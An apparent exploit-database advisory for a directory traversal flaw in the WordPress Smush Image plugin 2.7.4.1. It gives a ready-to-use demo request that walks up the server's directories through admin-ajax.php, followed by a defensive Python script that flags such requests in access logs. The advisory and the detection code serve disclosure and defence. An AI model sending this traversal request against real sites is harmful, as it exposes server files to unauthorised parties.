WordPress Smush Image 2.7.4.1 Directory Traversal Vulnerability

2017-10-04T00:00:00
ID 1337DAY-ID-28741
Type zdt
Reporter Ricardo Sanchez
Modified 2017-10-04T00:00:00

Description

WordPress Smush Image plugin version 2.7.4.1 suffers from a directory traversal vulnerability.

Credit: Ricardo Sanchez

The Smush Image WordPress plugin is prone to a file traversal vulnerability
because it fails to sufficiently protect folder privacy.

To exploit this issue, follow these steps:

Demo URL:
http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx


Confirm:
https://wordpress.org/support/topic/file-transversal-bug/#post-9554401
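
Detection example (added here, not part of the original advisory or the plugin's code): a Python check that scans web server access logs for `smush_get_directory_list` requests whose `dir` parameter climbs above its starting directory. The log lines are constructed samples in combined log format, the function names are hypothetical, and the check assumes `dir` is resolved relative to a base directory.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Oct/2017:10:00:01 +0000] "GET /wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx HTTP/1.1" 200 812
203.0.113.5 - - [04/Oct/2017:10:00:07 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=smush_get_directory_list&dir=..%2F..%2F&list_nonce=xxxxxxx HTTP/1.1" 200 640
198.51.100.9 - - [04/Oct/2017:10:01:12 +0000] "GET /wordpress/wp-admin/admin-ajax.php?dir=wp-content/uploads/2017/&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx HTTP/1.1" 200 455
198.51.100.9 - - [04/Oct/2017:10:01:30 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

def escapes_base(dir_value):
    """True if the (already URL-decoded) dir value resolves above its base directory."""
    # Assumption: dir is interpreted relative to a base directory.
    normalized = posixpath.normpath(dir_value.replace("\\", "/"))
    return normalized == ".." or normalized.startswith("../")

def find_traversal_requests(log_text):
    """Return (client, dir value, HTTP status) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes values, so encoded "../" is normalized too.
        # Only the query string is logged; POST bodies are not visible here.
        params = parse_qs(url.query, keep_blank_values=True)
        if "smush_get_directory_list" not in params.get("action", []):
            continue
        for value in params.get("dir", []):
            if escapes_base(value):
                hits.append((client, value, int(status)))
    return hits

if __name__ == "__main__":
    for client, value, status in find_traversal_requests(SAMPLE_LOG):
        print(f"{client} requested dir={value!r} (HTTP {status})")
```

A 200 status on a flagged request is worth triaging first, since it indicates the server returned a listing rather than rejecting the request.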

#  0day.today [2018-02-15]  #